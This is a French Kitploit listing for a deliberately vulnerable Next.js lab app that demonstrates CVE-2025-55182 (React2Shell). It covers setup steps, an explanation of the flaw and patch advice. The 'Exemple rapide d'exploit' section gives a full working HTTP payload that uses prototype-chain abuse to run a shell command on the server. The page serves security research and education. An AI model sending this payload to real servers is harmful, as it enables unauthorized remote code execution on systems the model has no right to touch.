Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
NextJS-app-CVE-2025-55182 — Preuve de concept d'une application Next.js démontrant CVE-2025-55182 (React2Shell), une RCE critique dans les composants serveur React, avec un exemple d'exploit et des recommandations d'atténuation pour la recherche en sécurité. | Kitploit
Outils/GitHubGitHub/s-mughal/nextjs-app-cve-2025-55182
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubs-mughal/nextjs-app-cve-2025-55182

NextJS-app-CVE-2025-55182

Preuve de concept d'une application Next.js démontrant CVE-2025-55182 (React2Shell), une RCE critique dans les composants serveur React, avec un exemple d'exploit et des recommandations d'atténuation pour la recherche en sécurité.

Voir le dépôt
1il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Preuve de concept Next.js CVE-2025-55182

Ceci est une application Next.js de preuve de concept vulnérable à CVE-2025-55182 (également connue sous le nom de "React2Shell"), une vulnérabilité critique d'exécution de code à distance (RCE) dans les composants serveur React.

⚠️ AVERTISSEMENT

Cette application est intentionnellement vulnérable et ne doit être utilisée que pour :

  • La recherche en sécurité
  • Des fins éducatives
  • Des tests dans des environnements isolés

NE PAS :

  • Déployer en production
  • Exposer à des réseaux non fiables
  • Utiliser avec des données sensibles

Détails de la vulnérabilité

CVE-2025-55182 affecte :

  • Les versions de React 19.0.0 à 19.2.0
  • Les versions de Next.js 15.x et 16.x (utilisant App Router)
  • Les applications utilisant les composants serveur React (RSC)

La vulnérabilité provient d'une désérialisation non sécurisée dans la gestion des charges utiles des composants serveur React, permettant à des attaquants non authentifiés d'exécuter du code arbitraire sur le serveur via des requêtes HTTP spécialement conçues.

Instructions de configuration

Option 1 : Développement local

  1. Installer les dépendances :

    root@kitploit:~
    npm install
    
  2. Lancer le serveur de développement :

    root@kitploit:~
    npm run dev
    
  3. Accéder à l'application : Ouvrir http://localhost:3000 dans votre navigateur.

Option 2 : Docker

  1. Construire l'image Docker :

    root@kitploit:~
    docker build -t nextjs-cve-2025-55182 .
    
  2. Exécuter le conteneur :

    root@kitploit:~
    docker run --rm -p 3000:3000 nextjs-cve-2025-55182
    
  3. Accéder à l'application : Ouvrir http://localhost:3000 dans votre navigateur.

Structure de l'application

  • Page de connexion (/) : Un formulaire de connexion simple utilisant les composants serveur React
  • Tableau de bord (/dashboard) : Une page protégée accessible après connexion

Composants vulnérables

Cette application utilise :

  • Next.js 15.1.0 (version vulnérable)
  • React 19.0.0 (version vulnérable)
  • App Router avec les composants serveur React (RSC)
  • Structure de base create-next-app

La vulnérabilité existe dans le mécanisme de désérialisation des charges utiles RSC, qui peut être exploitée en envoyant des requêtes HTTP multipart malveillantes directement aux routes de page (par exemple, http://localhost:3000 ou http://localhost:3000/dashboard). L'exploit fonctionne sur toute page utilisant les composants serveur React.

Exploitation

La vulnérabilité peut être exploitée en envoyant des requêtes HTTP spécialement conçues directement aux routes de page (par exemple, http://localhost:3000 ou http://localhost:3000/dashboard). L'exploit fonctionne sur toute page utilisant les composants serveur React.

Exemple rapide d'exploit

root@kitploit:~
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 740

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

L'exploit cible directement les routes de page - fonctionne sur localhost:3000 (page d'accueil) ou localhost:3000/dashboard (page du tableau de bord).

Atténuation

Pour corriger cette vulnérabilité :

  • Mettre à jour React vers la version 19.0.1, 19.1.2 ou 19.2.1+
  • Mettre à jour Next.js vers une version corrigée (15.0.5+ ou 16.x avec correctifs)

Références

  • CVE-2025-55182
  • Avis de sécurité React
  • Avis de sécurité Next.js

Licence

Cette preuve de concept est fournie uniquement à des fins éducatives et de recherche en sécurité.

Télécharger l’outil